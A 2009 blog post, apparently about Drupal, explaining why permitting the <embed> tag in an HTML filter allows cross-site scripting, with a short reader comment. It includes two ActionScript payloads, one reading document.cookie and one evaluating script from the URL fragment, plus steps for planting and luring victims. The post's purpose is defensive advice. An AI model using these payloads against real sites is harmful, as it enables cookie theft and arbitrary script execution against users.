Using <embed> for XSS
Heine — Fri, 30/10/2009 - 18:38
I see a lot less stray <script> tags in the "Allowed HTML tags:" of the HTML filter these days. The <embed> tag is something I still see a lot in misconfigured formats.
It's rather easy to exploit such formats to execute JavaScript with a little bit of ActionScript:
{
static function main(){
getURL('javascript:alert(document.cookie)');
}
}
Build with an ActionScript 2 compiler (eg Flex SDK), upload to a convenient location *), then make a post on the site that was so careless to allow the <embed> tag:
Excellent article, it's pleasure to read your blog ?
<a href="http://example.com/fxxgg">FOREX</a>
Now all you have to do is lead the victim to this URL:
If you can't be bothered to change your swf file all the time, you can attempt to create a generic XSS attack that fetches JS from the URL fragment:
{
static function main(){
getURL('javascript:eval(document.location.hash.substr(1))');
}
}
The victim now has to visit (use a URL shortener for maximum obfuscation):
That's it folks. Moral of the story: don't allow <embed> use in the HTML filter. If you need to embed videos, employ one of the modules that insert videos from trusted sources and prevent script interaction.
*) Bonus points if you upload the swf to another misconfigured Drupal site! Hint:
Thanks Heine, I've often
dalin (not verified) — Sun, 01/11/2009 - 13:27Thanks Heine, I've often tried to find the details of why embed was dangerous but could never find it.